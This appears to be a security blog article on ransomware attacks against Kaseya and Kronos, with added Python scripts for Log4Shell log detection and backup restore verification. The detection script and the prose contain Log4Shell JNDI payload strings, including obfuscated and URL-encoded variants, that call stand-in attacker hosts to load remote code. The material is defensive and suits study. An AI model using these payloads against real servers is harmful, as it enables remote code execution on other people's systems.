We first warned readers of the dangers of ransomware in 2007, comparing it to the kidnapping of your data.
If you’ve been a victim of a ransomware attack, the first thing you’ll probably notice is that your system runs much more slowly than it normally does—like “molasses in January,” one victim called it. Next, you’ll see text files appear on your desktop or in the “My Documents” folder. They’re usually entitled “README.TXT” or something similar.
The message will say something like:
“Hello, your files are now securely encrypted using an unbreakable 4096-bit algorithm. If you try to decrypt them, they will be automatically wiped. The only way to decrypt them and avoid their destruction is to purchase our decryption key. The price is 1 BTC. To make payment arrangements send an email message to firstname.lastname@example.org.”
Since 2007, though, there’s been an explosion in documented ransomware attacks. Some of the most damaging have hit companies that provide software or IT management as a service, because a single intrusion at the provider fans out to every customer downstream. One high-profile attack in July 2021 by a Russian-based criminal group calling itself REvil targeted Kaseya, Ltd., whose software is used by managed service providers (MSPs) to maintain their customers’ IT infrastructure and end-user systems.
The attackers exploited vulnerabilities in a Kaseya product called VSA, a remote monitoring and management tool used by MSPs serving at least 1,500 businesses and government agencies worldwide, and pushed their ransomware out through it. REvil encrypted the files of approximately 1,000 of those downstream customers and demanded a ransom from each. The total REvil collected isn’t known, but the gang demanded anywhere from a few thousand dollars to $5 million or more per victim to unlock their files.
But an attack discovered earlier this month dwarfs the Kaseya incursion. It targeted a company called Kronos (now part of UKG), which offers “workforce management and human capital management solutions.” Those solutions include scheduling, timekeeping and payroll products called UKG Workforce Central, UKG TeleStaff, Banking Scheduling Solutions, and UKG Healthcare Extensions.
On December 11, Kronos advised its customers, which include Tesla, the PUMA Group, the University of Illinois Health System, Kansas State University, the City of Cleveland, the New York Metropolitan Transportation Authority, and many others, of a “cyber security incident that has disrupted the Kronos Private Cloud.” This is the networking system on which these scheduling, timekeeping and payroll products are deployed.
Kronos then made a startling admission and recommendation:
“Given that it may take up to several weeks to restore system availability, we strongly recommend that you evaluate and implement alternative business continuity protocols related to the affected UKG solutions.”
In communications with individual clients, Kronos acknowledged that the attack “may have compromised employee information like names, addresses, social security numbers, and employee IDs.”
We have been in touch with one of the affected organizations – an institution with several thousand employees. Its chief technology officer acknowledges that for the moment, there is no way to track vacation time or sick time accrued. He also warned that the organization might not be able to provide timely tax forms for employees to file with their tax returns. He added, the organization’s IT is “scouring the internet looking for reports of lost employee data.” And “if we find any evidence that personal information has been compromised, we will share that information with employees.”
An employee of this institution I spoke to about the attack summarized the situation as a “sh*tshow.” He referred to the need to complete a “payroll adjustment form” to reflect holiday and overtime pay and that his manager had warned him it could be “months” before the payroll system was functioning normally.
It’s unclear how Kronos’ servers were infiltrated. The most common ways ransomware gets in are phishing emails carrying a malicious attachment or link, sent to a purchased list of target addresses, and stolen or guessed credentials for remote-access services. But it’s possible that the hackers who targeted Kronos used a newly disclosed vulnerability nicknamed “Log4Shell.” The flaw is in Log4j, a logging library for Java maintained by the Apache Software Foundation and embedded in some of the world’s most widely used applications and services. Successful exploitation lets an attacker run code of their choosing on the server doing the logging, with whatever privileges the vulnerable application has.
Attackers using Log4Shell don’t need anyone to click on a poisoned link; they only need to get the target system to log a short lookup string such as ${jndi:ldap://attacker-host/a}. Vulnerable versions of Log4j evaluate that string, connect to the attacker’s server, and load whatever it returns. Any field that ends up in a log will do: the body or subject of an email message, a username typed into a login form, or the User-Agent header of a web request.
Apache released a fixed version of Log4j in early December and has shipped further releases since, most recently on December 17, as gaps in the first fix were found; companies worldwide are rushing to locate and patch every copy of the library in their estates. Among the vendors whose products or services included the vulnerable library are Amazon Web Services, Microsoft, Cisco, Google Cloud, and IBM. The head of the US Cybersecurity and Infrastructure Security Agency referred to the vulnerability as “one of the most serious I’ve seen in my entire career, if not the most serious.”
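Because the exploit string has to pass through the target’s logs, those same logs are the first place to look for it. The script below, an added example rather than code from the original article or from Apache, scans web-server log lines for Log4Shell lookup strings. It goes beyond the plain ${jndi:…} form and also unwraps the URL encoding and nested lookups (${lower:J}, ${::-j}, ${env:NaN:-j}) that attackers used to evade simple string matches. The log lines are constructed for the example and the hosts in them are documentation addresses, not real callback servers.

```python
"""Scan web-server log lines for Log4Shell (CVE-2021-44228) lookup strings.

Added example. The log lines below are constructed; the hosts are
documentation addresses, not real callback servers.
"""
import re
from urllib.parse import unquote

# Log4j evaluates ${...} lookups inside anything it logs. Attackers hide the
# "jndi" keyword behind nested lookups that evaluate to single letters:
#   ${lower:J}              -> "j"   (case-conversion lookups)
#   ${::-j}, ${env:NaN:-j}  -> "j"   (a failed lookup falls back to its default)
# Collapsing those first lets one plain search for "${jndi:" catch all of them.
_CASE = re.compile(r"\$\{(lower|upper):([^${}]*)\}", re.IGNORECASE)
_DEFAULT = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")
_JNDI = re.compile(
    r"\$\{\s*jndi:(ldap|ldaps|rmi|dns|iiop|corba|nds|http)://([^/}\s]+)",
    re.IGNORECASE,
)


def normalize(text, max_rounds=10):
    """Resolve innermost case/default lookups until the text stops changing."""
    for _ in range(max_rounds):
        new = _CASE.sub(
            lambda m: m.group(2).lower() if m.group(1).lower() == "lower" else m.group(2).upper(),
            text,
        )
        new = _DEFAULT.sub(lambda m: m.group(1), new)
        if new == text:
            break
        text = new
    return text


def find_log4shell(line):
    """Return (scheme, host) of the first JNDI lookup in `line`, or None."""
    m = _JNDI.search(normalize(unquote(line)))
    return (m.group(1).lower(), m.group(2)) if m else None


def scan(lines):
    """Return [(line_number, scheme, host)] for every line carrying a lookup."""
    hits = []
    for n, line in enumerate(lines, 1):
        found = find_log4shell(line)
        if found:
            hits.append((n, found[0], found[1]))
    return hits


SAMPLE_LOG = [  # constructed Apache combined-format lines, not real traffic
    '10.0.0.5 - - [10/Dec/2021:14:02:11 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    # plain payload in the User-Agent header
    '198.51.100.7 - - [10/Dec/2021:14:02:12 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://198.51.100.7:1389/a}"',
    # case-lookup obfuscation inside a login username
    '198.51.100.8 - - [10/Dec/2021:14:02:13 +0000] '
    '"GET /login?user=${${lower:J}ndi:${lower:L}dap://evil.example:1389/x} HTTP/1.1" 401 0 "-" "curl/7.68"',
    # URL-encoded, default-value obfuscation, RMI instead of LDAP
    '198.51.100.9 - - [10/Dec/2021:14:02:14 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"%24%7B%24%7B%3A%3A-j%7D%24%7B%3A%3A-n%7D%24%7B%3A%3A-d%7D%24%7B%3A%3A-i%7D'
    '%3Armi%3A%2F%2Fcallback.example%2Fo%7D"',
]

if __name__ == "__main__":
    for n, scheme, host in scan(SAMPLE_LOG):
        print(f"line {n}: JNDI lookup via {scheme} to {host}")
```

A hit shows that someone sent the probe, not that it worked; whether the server was vulnerable, and whether it actually connected out to the listed host, has to be confirmed from the application’s own version and from outbound connection logs. The fix remains upgrading Log4j everywhere it is found.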
In the meantime, though, the companies and employees affected by the attack on Kronos don’t have many good options. For at least some of its clients, Kronos appears to have offered a 48-hour data restoration guarantee in case of a service outage. Obviously, the company won’t be able to honor it.
Another customer commented on Kronos’ community feed that it was ironic that, “Kronos response to all of us is to implement our organization’s current Business Continuity plan, yet they don’t have one.” Another asked, “Where are the backups, can’t the backups be restored? Are the backups stored in the same ‘cloud/space’ as production?”
These are all valid questions, and they also point to the solution for organizations (and individuals) defending themselves against ransomware and other cyber threats. Namely, back up your data daily and keep those backups offline. A backup that stays mounted, or that can be reached with the same credentials as the production systems, is just another file share for the ransomware to encrypt. An encrypted flash drive that is unplugged between backups is ideal for individuals; tape backups that are physically isolated from any network are one of the best solutions for businesses.
What’s more, never respond to emails suggesting software running on your system needs to be updated. Almost any legitimate update will announce itself within the program to be updated, not in an email; if in doubt, open the program or the vendor’s own site and check there.
Finally, periodically test your backups by actually restoring them to a spare system and confirming the data is intact, and have a step-by-step plan for restoring critical network systems. That way, if your PC, smartphone, or network is ever infected with ransomware, you’ll be ready.
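A restore test is only meaningful if you can tell a good restore from a bad one. The script below, an added example that is not part of the original article, runs a small backup drill: it copies a directory tree, records a SHA-256 hash of every file in a manifest, restores the copy, and checks the restored files against the manifest. It then simulates what ransomware does to a copy that is still online (one file overwritten with ciphertext, one deleted) and shows the check catching both. The directory layout, file contents and the manifest file name are constructed for the example.

```python
"""Backup round-trip drill: copy a tree, record SHA-256 hashes, restore, verify.

Added example; the directory layout and file contents are constructed here.
"""
import hashlib
import json
import shutil
import tempfile
from pathlib import Path

MANIFEST_NAME = "MANIFEST.json"  # hypothetical name for the hash manifest


def sha256_file(path):
    """Hash a file in chunks so large backups need not fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 20), b""):
            h.update(chunk)
    return h.hexdigest()


def make_backup(source, dest):
    """Copy `source` into `dest` and return {relative_path: sha256} for every file.

    The manifest is written alongside the copy; in practice keep a second copy
    of it somewhere the backup host cannot write to, so an attacker who
    tampers with the backup cannot also rewrite its manifest.
    """
    source, dest = Path(source), Path(dest)
    shutil.copytree(source, dest)
    manifest = {}
    for p in sorted(source.rglob("*")):
        if p.is_file():
            manifest[p.relative_to(source).as_posix()] = sha256_file(p)
    (dest / MANIFEST_NAME).write_text(json.dumps(manifest, indent=2, sort_keys=True))
    return manifest


def restore(backup, target):
    """Copy a backup back into place, leaving the manifest out of the restored tree."""
    shutil.copytree(Path(backup), Path(target), ignore=shutil.ignore_patterns(MANIFEST_NAME))


def verify_restore(restored, manifest):
    """Compare a restored tree against the manifest.

    Returns a sorted list of problems ("missing: <path>" or "modified: <path>");
    an empty list means every file came back byte-for-byte.
    """
    restored = Path(restored)
    problems = []
    for rel, digest in manifest.items():
        p = restored / rel
        if not p.is_file():
            problems.append("missing: " + rel)
        elif sha256_file(p) != digest:
            problems.append("modified: " + rel)
    return sorted(problems)


def drill():
    """Run the full drill on constructed data; return (clean_result, tampered_result)."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        src = root / "payroll"
        (src / "2021").mkdir(parents=True)
        (src / "2021" / "timesheets.csv").write_text("emp_id,hours\n1001,40\n1002,38\n")
        (src / "schedule.txt").write_text("Mon-Fri 09:00-17:00\n")

        manifest = make_backup(src, root / "backup")
        restore(root / "backup", root / "restored")
        clean = verify_restore(root / "restored", manifest)

        # Simulate what ransomware does to a copy that is still online:
        # one file overwritten with ciphertext, another deleted.
        (root / "restored" / "2021" / "timesheets.csv").write_bytes(b"\x8f\x11ENCRYPTED\x00")
        (root / "restored" / "schedule.txt").unlink()
        tampered = verify_restore(root / "restored", manifest)
        return clean, tampered


if __name__ == "__main__":
    clean, tampered = drill()
    print("clean restore problems:", clean)
    print("tampered copy problems:", tampered)
```

The hashes are taken from the source before the copy is made, so the check catches corruption introduced by the backup media as well as by an attacker; running it on a schedule against the offline copy is the “periodically test your backups” step made concrete.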